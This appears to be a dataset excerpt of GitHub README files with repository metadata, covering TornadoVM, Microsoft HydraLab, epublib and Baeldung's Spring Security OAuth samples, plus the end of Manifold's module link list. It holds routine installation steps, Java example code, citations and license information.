[Manifold : _Property Files_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-properties)
[Manifold : _Image_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-image)
[Manifold : _Dark Java_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-darkj)
[Manifold : _JavaScript_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)
[Manifold : _Java Templates_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
[Manifold : _String Interpolation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)
[Manifold : _(Un)checked Exceptions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)
[Manifold : _Preprocessor_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
[Manifold : _Science_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
[Manifold : _Collections_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections)
[Manifold : _I/0_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-io)
[Manifold : _Text_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-text)
>Experiment with sample projects:
>* [Manifold : _Sample App_](https://github.com/manifold-systems/manifold-sample-project)
>* [Manifold : _Sample SQL App_](https://github.com/manifold-systems/manifold-sql-sample-project)
>* [Manifold : _Sample GraphQL App_](https://github.com/manifold-systems/manifold-sample-graphql-app)
>* [Manifold : _Sample REST API App_](https://github.com/manifold-systems/manifold-sample-rest-api)
>* [Manifold : _Sample Web App_](https://github.com/manifold-systems/manifold-sample-web-app)
>* [Manifold : _Gradle Example Project_](https://github.com/manifold-systems/manifold-simple-gradle-project)
>* [Manifold : _Sample Kotlin App_](https://github.com/manifold-systems/manifold-sample-kotlin-app)
## Platforms
Manifold supports:
* Java SE (8 - 21)
* [Android](http://manifold.systems/android.html)
* [Kotlin](http://manifold.systems/kotlin.html) (limited)
Comprehensive IDE support is also available for IntelliJ IDEA and Android Studio.
## [Chat](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg)
Join our [Slack Group](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) to start
a discussion, ask questions, provide feedback, etc. Someone is usually there to help.
"
beehive-lab/TornadoVM,master,1105,96,2018-09-07T09:37:44Z,120197,31,TornadoVM: A practical and efficient heterogeneous programming framework for managed languages,ai artificial-intelligence cuda fpga gpgpu gpu-acceleration gpu-computing gpus graalvm high-performance java java-library-acceleration level-zero-gpu-runtime levelzero multi-core opencl spirv tornadovm,"# TornadoVM
TornadoVM is a plug-in to OpenJDK and GraalVM that allows programmers to automatically run Java programs on
heterogeneous hardware.
TornadoVM targets OpenCL, PTX and SPIR-V compatible devices which include multi-core CPUs, dedicated
GPUs (Intel, NVIDIA, AMD), integrated GPUs (Intel HD Graphics and ARM Mali), and FPGAs (Intel and Xilinx).
TornadoVM has three backends that generate OpenCL C, NVIDIA CUDA PTX assembly, and SPIR-V binary.
Developers can choose which backends to install and run.
----------------------
**Website**: [tornadovm.org](https://www.tornadovm.org)
**Documentation**: [https://tornadovm.readthedocs.io/en/latest/](https://tornadovm.readthedocs.io/en/latest/)
For a quick introduction please read the following [FAQ](https://tornadovm.readthedocs.io/en/latest/).
**Latest Release:** TornadoVM 1.0.3 - 27/03/2024 :
See [CHANGELOG](https://tornadovm.readthedocs.io/en/latest/CHANGELOG.html).
----------------------
## 1. Installation
In Linux and macOS, TornadoVM can be installed automatically with
the [installation script](https://tornadovm.readthedocs.io/en/latest/installation.html). For example:
```bash
$ ./bin/tornadovm-installer
usage: tornadovm-installer [-h] [--version] [--jdk JDK] [--backend BACKEND] [--listJDKs] [--javaHome JAVAHOME]
TornadoVM Installer Tool. It will install all software dependencies except the GPU/FPGA drivers
optional arguments:
-h, --help show this help message and exit
--version Print version of TornadoVM
--jdk JDK Select one of the supported JDKs. Use --listJDKs option to see all supported ones.
--backend BACKEND Select the backend to install: { opencl, ptx, spirv }
--listJDKs List all JDK supported versions
--javaHome JAVAHOME Use a JDK from a user directory
```
**NOTE** Select the desired backend:
* `opencl`: Enables the OpenCL backend (requires OpenCL drivers)
* `ptx`: Enables the PTX backend (requires NVIDIA CUDA drivers)
* `spirv`: Enables the SPIRV backend (requires Intel Level Zero drivers)
Example of installation:
```bash
# Install the OpenCL backend with OpenJDK 21
$ ./bin/tornadovm-installer --jdk jdk21 --backend opencl
# It is also possible to combine different backends:
$ ./bin/tornadovm-installer --jdk jdk21 --backend opencl,spirv,ptx
```
Alternatively, TornadoVM can be installed either
manually [from source](https://tornadovm.readthedocs.io/en/latest/installation.html#b-manual-installation) or
by [using Docker](https://tornadovm.readthedocs.io/en/latest/docker.html).
If you are planning to use Docker with TornadoVM on GPUs, you can also
follow [these](https://github.com/beehive-lab/docker-tornado#docker-for-tornadovm) guidelines.
You can also run TornadoVM on Amazon AWS CPUs, GPUs, and FPGAs following the
instructions [here](https://tornadovm.readthedocs.io/en/latest/cloud.html).
## 2. Usage Instructions
TornadoVM is currently being used to accelerate machine learning and deep learning applications, computer vision,
physics simulations, financial applications, computational photography, and signal processing.
Featured use-cases:
- [kfusion-tornadovm](https://github.com/beehive-lab/kfusion-tornadovm): Java application for accelerating a
computer-vision application using the Tornado-APIs to run on discrete and integrated GPUs.
- [Java Ray-Tracer](https://github.com/Vinhixus/TornadoVM-Ray-Tracer): Java application accelerated with TornadoVM for
real-time ray-tracing.
We also have a set
of [examples](https://github.com/beehive-lab/TornadoVM/tree/master/tornado-examples/src/main/java/uk/ac/manchester/tornado/examples)
that includes NBody, DFT, KMeans computation and matrix computations.
**Additional Information**
- [General Documentation](https://tornadovm.readthedocs.io/en/latest/introduction.html)
- [Benchmarks](https://tornadovm.readthedocs.io/en/latest/benchmarking.html)
- [How TornadoVM executes reductions](https://tornadovm.readthedocs.io/en/latest/programming.html#parallel-reductions)
- [Execution Flags](https://tornadovm.readthedocs.io/en/latest/flags.html)
- [FPGA execution](https://tornadovm.readthedocs.io/en/latest/fpga-programming.html)
- [Profiler Usage](https://tornadovm.readthedocs.io/en/latest/profiler.html)
## 3. Programming Model
TornadoVM exposes to the programmer task-level, data-level and pipeline-level parallelism via a light Application
Programming Interface (API). In addition, TornadoVM uses single-source property, in which the code to be accelerated and
the host code live in the same Java program.
Compute-kernels in TornadoVM can be programmed using two different approaches (APIs):
#### a) Loop Parallel API
Compute kernels are written in a sequential form (tasks programmed for a single thread execution). To express
parallelism, TornadoVM exposes two annotations that can be used in loops and parameters: a) `@Parallel` for annotating
parallel loops; and b) `@Reduce` for annotating parameters used in reductions.
The following code snippet shows a full example to accelerate Matrix-Multiplication using TornadoVM and the
loop-parallel API:
```java
public class Compute {
private static void mxmLoop(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
for (@Parallel int i = 0; i < size; i++) {
for (@Parallel int j = 0; j < size; j++) {
float sum = 0.0f;
for (int k = 0; k < size; k++) {
sum += A.get(i, k) * B.get(k, j);
}
C.set(i, j, sum);
}
}
}
public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
TaskGraph taskGraph = new TaskGraph(""s0"")
.transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution
.task(""t0"", Compute::mxmLoop, A, B, C, size) // Each task points to an existing Java method
.transferToHost(DataTransferMode.EVERY_EXECUTION, C); // Transfer data from device to host
// Create an immutable task-graph
ImmutableTaskGraph immutableTaskGraph = taskGraph.snaphot();
// Create an execution plan from an immutable task-graph
TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph);
// Execute the execution plan
TorandoExecutionResult executionResult = executionPlan.execute();
}
}
```
#### b) Kernel API
Another way to express compute-kernels in TornadoVM is via the **kernel API**.
To do so, TornadoVM exposes a `KernelContext` with which the application can directly access the thread-id, allocate
memory in local memory (shared memory on NVIDIA devices), and insert barriers.
This model is similar to programming compute-kernels in OpenCL and CUDA.
Therefore, this API is more suitable for GPU/FPGA expert programmers that want more control or want to port existing
CUDA/OpenCL compute kernels into TornadoVM.
The following code-snippet shows the Matrix Multiplication example using the kernel-parallel API:
```java
public class Compute {
private static void mxmKernel(KernelContext context, Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
int idx = context.globalIdx
int jdx = context.globalIdy;
float sum = 0;
for (int k = 0; k < size; k++) {
sum += A.get(idx, k) * B.get(k, jdx);
}
C.set(idx, jdx, sum);
}
public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
// When using the kernel-parallel API, we need to create a Grid and a Worker
WorkerGrid workerGrid = new WorkerGrid2D(size, size); // Create a 2D Worker
GridScheduler gridScheduler = new GridScheduler(""s0.t0"", workerGrid); // Attach the worker to the Grid
KernelContext context = new KernelContext(); // Create a context
workerGrid.setLocalWork(32, 32, 1); // Set the local-group size
TaskGraph taskGraph = new TaskGraph(""s0"")
.transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution
.task(""t0"", Compute::mxmKernel, context, A, B, C, size) // Each task points to an existing Java method
.transferToHost(DataTransferMode.EVERY_EXECUTION, C); // Transfer data from device to host
// Create an immutable task-graph
ImmutableTaskGraph immutableTaskGraph = taskGraph.snapshot();
// Create an execution plan from an immutable task-graph
TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph);
// Execute the execution plan
executionPlan.withGridScheduler(gridScheduler)
.execute();
}
}
```
Additionally, the two modes of expressing parallelism (kernel and loop parallelization) can be combined in the same task
graph object.
## 4. Dynamic Reconfiguration
Dynamic reconfiguration is the ability of TornadoVM to perform live task migration between devices, which means that
TornadoVM decides where to execute the code to increase performance (if possible). In other words, TornadoVM switches
devices if it can detect that a specific device can yield better performance (compared to another).
With the task-migration, the TornadoVM's approach is to only switch device if it detects an application can be executed
faster
than the CPU execution using the code compiled by C2 or Graal-JIT, otherwise it will stay on the CPU. So TornadoVM can
be seen as a complement to C2 and Graal JIT compilers. This is because there is no single hardware to best execute all
workloads
efficiently. GPUs are very good at exploiting SIMD applications, and FPGAs are very good at exploiting pipeline
applications. If your applications follow those models, TornadoVM will likely select heterogeneous hardware. Otherwise,
it will stay on the CPU using the default compilers (C2 or Graal).
To use the dynamic reconfiguration, you can execute using TornadoVM policies.
For example:
```java
// TornadoVM will execute the code in the best accelerator.
executionPlan.withDynamicReconfiguration(Policy.PERFORMANCE, DRMode.PARALLEL)
.
execute();
```
Further details and instructions on how to enable this feature can be found here.
* Dynamic
reconfiguration: [https://dl.acm.org/doi/10.1145/3313808.3313819](https://dl.acm.org/doi/10.1145/3313808.3313819)
## 5. How to Use TornadoVM in your Projects?
To use TornadoVM, you need two components:
a) The TornadoVM `jar` file with the API. The API is licensed as GPLV2 with Classpath Exception.
b) The core libraries of TornadoVM along with the dynamic library for the driver code (`.so` files for OpenCL, PTX
and/or SPIRV/Level Zero).
You can import the TornadoVM API by setting this the following dependency in the Maven `pom.xml` file:
```xml
universityOfManchester-graalhttps://raw.githubusercontent.com/beehive-lab/tornado/maven-tornadovmtornadotornado-api1.0.3tornadotornado-matrices1.0.3
```
To run TornadoVM, you need to either install the TornadoVM extension for GraalVM/OpenJDK, or run with our
Docker [images](https://github.com/beehive-lab/docker-tornado).
## 6. Additional Resources
[Here](https://tornadovm.readthedocs.io/en/latest/resources.html) you can find videos, presentations, tech-articles and
artefacts describing TornadoVM, and how to use it.
## 7. Academic Publications
If you are using **TornadoVM >= 0.2** (which includes the Dynamic Reconfiguration, the initial FPGA support and CPU/GPU
reductions), please use the following citation:
```bibtex
@inproceedings{Fumero:DARHH:VEE:2019,
author = {Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Clarkson, James and Kotselidis, Christos},
title = {{Dynamic Application Reconfiguration on Heterogeneous Hardware.}},
booktitle = {Proceedings of the 15th ACM SIGPLAN/SIGOPS International Conference on Virtual Execution Environments},
series = {VEE '19},
year = {2019},
doi = {10.1145/3313808.3313819},
publisher = {Association for Computing Machinery}
}
```
If you are using **Tornado 0.1** (Initial release), please use the following citation in your work.
```bibtex
@inproceedings{Clarkson:2018:EHH:3237009.3237016,
author = {Clarkson, James and Fumero, Juan and Papadimitriou, Michail and Zakkak, Foivos S. and Xekalaki, Maria and Kotselidis, Christos and Luj\'{a}n, Mikel},
title = {{Exploiting High-performance Heterogeneous Hardware for Java Programs Using Graal}},
booktitle = {Proceedings of the 15th International Conference on Managed Languages \& Runtimes},
series = {ManLang '18},
year = {2018},
isbn = {978-1-4503-6424-9},
location = {Linz, Austria},
pages = {4:1--4:13},
articleno = {4},
numpages = {13},
url = {http://doi.acm.org/10.1145/3237009.3237016},
doi = {10.1145/3237009.3237016},
acmid = {3237016},
publisher = {ACM},
address = {New York, NY, USA},
keywords = {Java, graal, heterogeneous hardware, openCL, virtual machine},
}
```
Selected publications can be found [here](https://tornadovm.readthedocs.io/en/latest/publications.html).
## 8. Acknowledgments
This work is partially funded by [Intel corporation](https://www.intel.com/content/www/us/en/homepage.html).
In addition, it has been supported by the following EU & UKRI grants (most recent first):
- EU Horizon Europe & UKRI [AERO 101092850](https://cordis.europa.eu/project/id/101092850).
- EU Horizon Europe & UKRI [INCODE 101093069](https://cordis.europa.eu/project/id/101093069).
- EU Horizon Europe & UKRI [ENCRYPT 101070670](https://encrypt-project.eu).
- EU Horizon Europe & UKRI [TANGO 101070052](https://tango-project.eu).
- EU Horizon 2020 [ELEGANT 957286](https://www.elegant-h2020.eu/).
- EU Horizon 2020 [E2Data 780245](https://e2data.eu).
- EU Horizon 2020 [ACTiCLOUD 732366](https://acticloud.eu).
Furthermore, TornadoVM has been supported by the following [EPSRC](https://www.ukri.org/councils/epsrc/) grants:
- [PAMELA EP/K008730/1](http://apt.cs.manchester.ac.uk/projects/PAMELA/).
- [AnyScale Apps EP/L000725/1](https://gow.epsrc.ukri.org/NGBOViewGrant.aspx?GrantRef=EP/L000725/1).
## 9. Contributions and Collaborations
We welcome collaborations! Please see how to contribute to the project in the [CONTRIBUTING](CONTRIBUTING.md) page.
### Write your questions and proposals:
Additionally, you can open new proposals on the GitHub
discussions [page](https://github.com/beehive-lab/TornadoVM/discussions).
Alternatively, you can share a Google document with us.
### Collaborations:
For Academic & Industry collaborations, please contact [here](https://www.tornadovm.org/contact-us).
## 10. TornadoVM Team
Visit our [website](https://tornadovm.org) to meet the [team](https://www.tornadovm.org/about-us).
## 11. Licenses
To use TornadoVM, you can link the TornadoVM API to your application which is under Apache 2.
Each Java TornadoVM module is licensed as follows:
| Module | License |
|--------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Tornado-API | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Runtime | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception |
| Tornado-Assembly | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Drivers | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception |
| Tornado-Drivers-OpenCL-Headers | [![License](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/KhronosGroup/OpenCL-Headers/blob/master/LICENSE) |
| Tornado-scripts | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Annotation | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Unittests | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Benchmarks | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Examples | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Matrices | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| |
"
microsoft/HydraLab,main,1062,87,2022-04-28T09:18:16Z,142800,41,Intelligent cloud testing made easy.,azure chatgpt cloud-testing cross-platform developer-tools device-farm e2e-testing mobile-development performance-testing platform-engineering spring-boot test-automation testgpt testing testing-framework ui-testing,"
## What is Hydra Lab?
As mentioned in the above video, Hydra Lab is a framework that can help you easily build a cloud-testing platform utilizing the test devices/machines in hand.
Capabilities of Hydra Lab include:
- Scalable test device management under the center-agent distributed design; Test task management and test result visualization.
- Powering [Android Espresso Test](https://developer.android.com/training/testing/espresso), and Appium(Java) test on different platforms: Windows/iOS/Android/Browser/Cross-platform.
- Case-free test automation: Monkey test, Smart exploratory test.
For more details, you may refer to:
- [Introduction: What is Hydra Lab?](https://github.com/microsoft/HydraLab/wiki)
- [How Hydra Lab Empowers Microsoft Mobile Testing and Test Intelligence](https://medium.com/microsoft-mobile-engineering/how-hydra-lab-empowers-microsoft-mobile-testing-e4bd831ecf41)
## Get Started
Please visit our **[GitHub Project Wiki](https://github.com/microsoft/HydraLab/wiki)** to understand the dev environment setup procedure: [Contribution Guideline](CONTRIBUTING.md).
**Supported environments for Hydra Lab agent**: Windows, Mac OSX, and Linux ([Docker](https://github.com/microsoft/HydraLab/blob/main/agent/README.md#run-agent-in-docker)).
**Supported platforms and frameworks matrix**:
| | Appium(Java) | Espresso | XCTest | Maestro | Python Runner |
| ---- |--------------|---- | ---- | ---- | --- |
|Android| ✔ | ✔ | x | ✔ | ✔ |
|iOS| ✔ | x | ✔ | ✔ | ✔ |
|Windows| ✔ | x | x | x | ✔ |
|Web (Browser)| ✔ | x | x | x | ✔ |
### Quick guide on out-of-box Uber docker image
Hydra Lab offers an out-of-box experience of the Docker image, and we call it `Uber`. You can follow the below steps and start your docker container with both a center instance and an agent instance:
**Step 1. Download and install [Docker](https://www.docker.com)**
**Step 2. Download latest Uber Docker image**
```bash
docker pull ghcr.io/microsoft/hydra-lab-uber:latest
```
**This step is necessary.** Without this step and jump to step 3, you may target at the local cached Docker image with `latest` tag if it exists.
**Step 3. Run on your machine**
By Default, Hydra Lab will use the local file system as a storage solution, and you may type the following in your terminal to run it:
```bash
docker run -p 9886:9886 --name=hydra-lab ghcr.io/microsoft/hydra-lab-uber:latest
```
> We strongly recommend using [Azure Blob Storage](https://azure.microsoft.com/en-us/products/storage/blobs/) service as the file storage solution, and Hydra Lab has native, consistent, and validated support for it.
**Step 3. Visit the web page and view your connected devices**
> Url: http://localhost:9886/portal/index.html#/ (or your custom port).
Enjoy starting your journey of exploration!
**Step 4. Perform the test procedure with a minimal setup**
Note: For Android, Uber image only supports **Espresso/Instrumentation** test. See the ""User Manual"" section on this page for more features: [Hydra Lab Wikis](https://github.com/microsoft/HydraLab/wiki).
**To run a test with Uber image and local storage:**
- On the front-end page, go to the `Runner` tab and select `HydraLab Client`.
- Click `Run` and change ""Espresso test scope"" to `Test app`, click `Next`.
- Pick an available device, click `Next` again, and click `Run` to start the test.
- When the test is finished, you can view the test result in the `Task` tab on the left navigator of the front-end page.
![Test trigger steps](docs/images/test-trigger-steps.png)
### Build and run Hydra Lab from the source
You can also run the center java Spring Boot service (a runnable Jar) separately with the following commands:
> The build and run process will require JDK11 | NPM | Android SDK platform-tools in position.
**Step 1. Run Hydra Lab center service**
```bash
# In the project root, switch to the react folder to build the Web front.
cd react
npm ci
npm run pub
# Get back to the project root, and build the center runnable Jar.
cd ..
# For the gradlew command, if you are on Windows please replace it with `./gradlew` or `./gradlew.bat`
gradlew :center:bootJar
# Run it, and then visit http://localhost:9886/portal/index.html#/
java -jar center/build/libs/center.jar
# Then visit http://localhost:9886/portal/index.html#/auth to generate a new agent ID and agent secret.
```
> If you encounter the error: `Error: error:0308010C:digital envelope routines::unsupported`, set the System Variable `NODE_OPTIONS` as `--openssl-legacy-provider` and then restart the terminal.
**Step 2. Run Hydra Lab agent service**
```bash
# In the project root
cd android_client
# Build the Android client APK
./gradlew assembleDebug
cp app/build/outputs/apk/debug/app-debug.apk ../common/src/main/resources/record_release.apk
# If you don't have the SDK for Android ,you can download the prebuilt APK in https://github.com/microsoft/HydraLab/releases
# Back to the project root
cd ..
# In the project root, copy the sample config file and update the:
# YOUR_AGENT_NAME, YOUR_REGISTERED_AGENT_ID and YOUR_REGISTERED_AGENT_SECRET.
cp agent/application-sample.yml application.yml
# Then build an agent jar and run it
gradlew :agent:bootJar
java -jar agent/build/libs/agent.jar
```
**Step 3. visit http://localhost:9886/portal/index.html#/ and view your connected devices**
### More integration guidelines:
- [Test agent setup](https://github.com/microsoft/HydraLab/wiki/Test-agent-setup)
- [Trigger a test task run in the Hydra Lab test service](https://github.com/microsoft/HydraLab/wiki/Trigger-a-test-task-run-in-the-Hydra-Lab-test-service)
- [Deploy Center Docker Container](https://github.com/microsoft/HydraLab/wiki/Deploy-Center-Docker-Container)
## Contribute
Your contribution to Hydra Lab will make a difference for the entire test automation ecosystem. Please refer to **[CONTRIBUTING.md](CONTRIBUTING.md)** for instructions.
### Contributor Hero Wall:
## Contact Us
You can reach us by [opening an issue](https://github.com/microsoft/HydraLab/issues/new) or [sending us mails](mailto:hydra_lab_support@microsoft.com).
## Microsoft Give Sponsors
Thank you for your contribution to [Microsoft employee giving program](https://aka.ms/msgive) in the name of Hydra Lab:
[@Germey(崔庆才)](https://github.com/Germey), [@SpongeOnline(王创)](https://github.com/SpongeOnline), [@ellie-mac(陈佳佩)](https://github.com/ellie-mac), [@Yawn(刘俊钦)](https://github.com/Aqinqin48), [@White(刘子凡)](https://github.com/jkfhklh), [@597(姜志鹏)](https://github.com/JZP1996), [@HCG(尹照宇)](https://github.com/mahoshojoHCG)
## License & Trademarks
The entire codebase is under [MIT license](https://github.com/microsoft/HydraLab/blob/main/LICENSE).
This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party’s policies.
We use the Microsoft Clarity Analysis Platform for front end client data dashboard, please refer to [Clarity Overview](https://learn.microsoft.com/en-us/clarity/setup-and-installation/about-clarity) and https://clarity.microsoft.com/ to learn more.
Instructions to turn off the Clarity:
Open [MainActivity](https://github.com/microsoft/HydraLab/blob/main/android_client/app/src/main/java/com/microsoft/hydralab/android/client/MainActivity.java), comment the line which call the initClarity(), and rebuild the Hydra Lab Client apk, repalce the one in the agent resources folder.
[Telemetry/data collection notice](https://docs.opensource.microsoft.com/releasing/general-guidance/telemetry)
"
psiegman/epublib,master,1024,311,2009-11-18T09:37:52Z,2978,86,a java library for reading and writing epub files,,"# epublib
Epublib is a java library for reading/writing/manipulating epub files.
It consists of 2 parts: a core that reads/writes epub and a collection of tools.
The tools contain an epub cleanup tool, a tool to create epubs from html files, a tool to create an epub from an uncompress html file.
It also contains a swing-based epub viewer.
![Epublib viewer](http://www.siegmann.nl/wp-content/uploads/Alice%E2%80%99s-Adventures-in-Wonderland_2011-01-30_18-17-30.png)
The core runs both on android and a standard java environment. The tools run only on a standard java environment.
This means that reading/writing epub files works on Android.
## Build status
* Travis Build Status: [![Build Status](https://travis-ci.org/psiegman/epublib.svg?branch=master)](https://travis-ci.org/psiegman/epublib)
## Command line examples
Set the author of an existing epub
java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --author Tester,Joe
Set the cover image of an existing epub
java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --cover-image my_cover.jpg
## Creating an epub programmatically
package nl.siegmann.epublib.examples;
import java.io.InputStream;
import java.io.FileOutputStream;
import nl.siegmann.epublib.domain.Author;
import nl.siegmann.epublib.domain.Book;
import nl.siegmann.epublib.domain.Metadata;
import nl.siegmann.epublib.domain.Resource;
import nl.siegmann.epublib.domain.TOCReference;
import nl.siegmann.epublib.epub.EpubWriter;
public class Translator {
private static InputStream getResource( String path ) {
return Translator.class.getResourceAsStream( path );
}
private static Resource getResource( String path, String href ) {
return new Resource( getResource( path ), href );
}
public static void main(String[] args) {
try {
// Create new Book
Book book = new Book();
Metadata metadata = book.getMetadata();
// Set the title
metadata.addTitle(""Epublib test book 1"");
// Add an Author
metadata.addAuthor(new Author(""Joe"", ""Tester""));
// Set cover image
book.setCoverImage(
getResource(""/book1/test_cover.png"", ""cover.png"") );
// Add Chapter 1
book.addSection(""Introduction"",
getResource(""/book1/chapter1.html"", ""chapter1.html"") );
// Add css file
book.getResources().add(
getResource(""/book1/book1.css"", ""book1.css"") );
// Add Chapter 2
TOCReference chapter2 = book.addSection( ""Second Chapter"",
getResource(""/book1/chapter2.html"", ""chapter2.html"") );
// Add image used by Chapter 2
book.getResources().add(
getResource(""/book1/flowers_320x240.jpg"", ""flowers.jpg""));
// Add Chapter2, Section 1
book.addSection(chapter2, ""Chapter 2, section 1"",
getResource(""/book1/chapter2_1.html"", ""chapter2_1.html""));
// Add Chapter 3
book.addSection(""Conclusion"",
getResource(""/book1/chapter3.html"", ""chapter3.html""));
// Create EpubWriter
EpubWriter epubWriter = new EpubWriter();
// Write the Book as Epub
epubWriter.write(book, new FileOutputStream(""test1_book1.epub""));
} catch (Exception e) {
e.printStackTrace();
}
}
}
## Usage in Android
Add the following lines to your `app` module's `build.gradle` file:
repositories {
maven {
url 'https://github.com/psiegman/mvn-repo/raw/master/releases'
}
}
dependencies {
implementation('nl.siegmann.epublib:epublib-core:4.0') {
exclude group: 'org.slf4j'
exclude group: 'xmlpull'
}
implementation 'org.slf4j:slf4j-android:1.7.25'
}
"
Baeldung/spring-security-oauth,master,1963,1951,2016-03-02T09:04:07Z,4300,15,"Just Announced - Learn Spring Security OAuth"": """,oauth spring-security spring-security-oauth,"## Spring Security OAuth
I've just announced a new course, dedicated on exploring the new OAuth2 stack in Spring Security 5 - Learn Spring Security OAuth:
http://bit.ly/github-lsso
## Build the Project
```
mvn clean install
```
## Projects/Modules
This project contains a number of modules, here is a quick description of what each module contains:
- `oauth-rest` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack
- `oauth-jwt` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack, focused on JWT support
- `oauth-jws-jwk-legacy` - Authorization Server and Resource Server for JWS + JWK in a Spring Security OAuth2 Application
- `oauth-legacy` - Authorization Server, Resource Server, Angular and AngularJS Apps for legacy Spring Security OAuth2
## Run the Modules
You can run any sub-module using command line:
```
mvn spring-boot:run
```
If you're using Spring STS, you can also import them and run them directly, via the Boot Dashboard
You can then access the UI application - for example the module using the Password Grant - like this:
`http://localhost:8084/`
You can login using these credentials, username:john and password:123
## Run the Angular 7 Modules
- To run any of Angular7 front-end modules (_spring-security-oauth-ui-implicit-angular_ , _spring-security-oauth-ui-password-angular_ and _oauth-ui-authorization-code-angular_) , we need to build the app first:
```
mvn clean install
```
- Then we need to navigate to our Angular app directory:
```
cd src/main/resources
```
And run the command to download the dependencies:
```
npm install
```
- Finally, we will start our app:
```
npm start
```
- Note: Angular7 modules are commented out because these don't build on Jenkins as they need npm installed, but they build properly locally
- Note for Angular version < 4.3.0: You should comment out the HttpClient and HttpClientModule import in app.module and app.service.ts. These version rely on the HttpModule.
## Using the JS-only SPA OAuth Client
The main purpose of these projects are to analyze how OAuth should be carried out on Javascript-only Single-Page-Applications, using the authorization_code flow with PKCE.
The *clients-SPA-legacy/clients-js-only-react-legacy* project includes a very simple Spring Boot Application serving a couple of separate Single-Page-Applications developed in React.
It includes two pages:
* a 'Step-By-Step' guide, where we analyze explicitly each step that we need to carry out to obtain an access token and request a secured resource
* a 'Real Case' scenario, where we can log in, and obtain or use secured endpoints (provided by the Auth server and by a Custom server we set up)
* the Article's Example Page, with the exact same code that is shown in the related article
The Step-By-Step guide supports using different providers (Authorization Servers) by just adding (or uncommenting) the corresponding entries in the static/*spa*/js/configs.js.
### The 'Step-by-Step' OAuth Client with PKCE page
After running the Spring Boot Application (a simple *mvn spring-boot:run* command will be enough), we can browse to *http://localhost:8080/pkce-stepbystep/index.html* and follow the steps to find out what it takes to obtain an access token using the Authorization Code with PKCE Flow.
When prompted the login form, we might need to create a user for our Application first.
### The 'Real-Case' OAuth Client with PKCE page
To use all the features contained in the *http://localhost:8080/pkce-realcase/index.html* page, we'll need to first start the resource server (clients-SPA-legacy/oauth-resource-server-auth0-legacy).
In this page, we can:
* List the resources in our resource server (public, no permissions needed)
* Add resources (we're requested the permissions to do that when logging in. For simplicity sake, we just request the existing 'profile' scope)
* Remove resources (we actually can't accomplish this task, because the resource server requires the application to have permissions that were not included in the existing scopes)
"
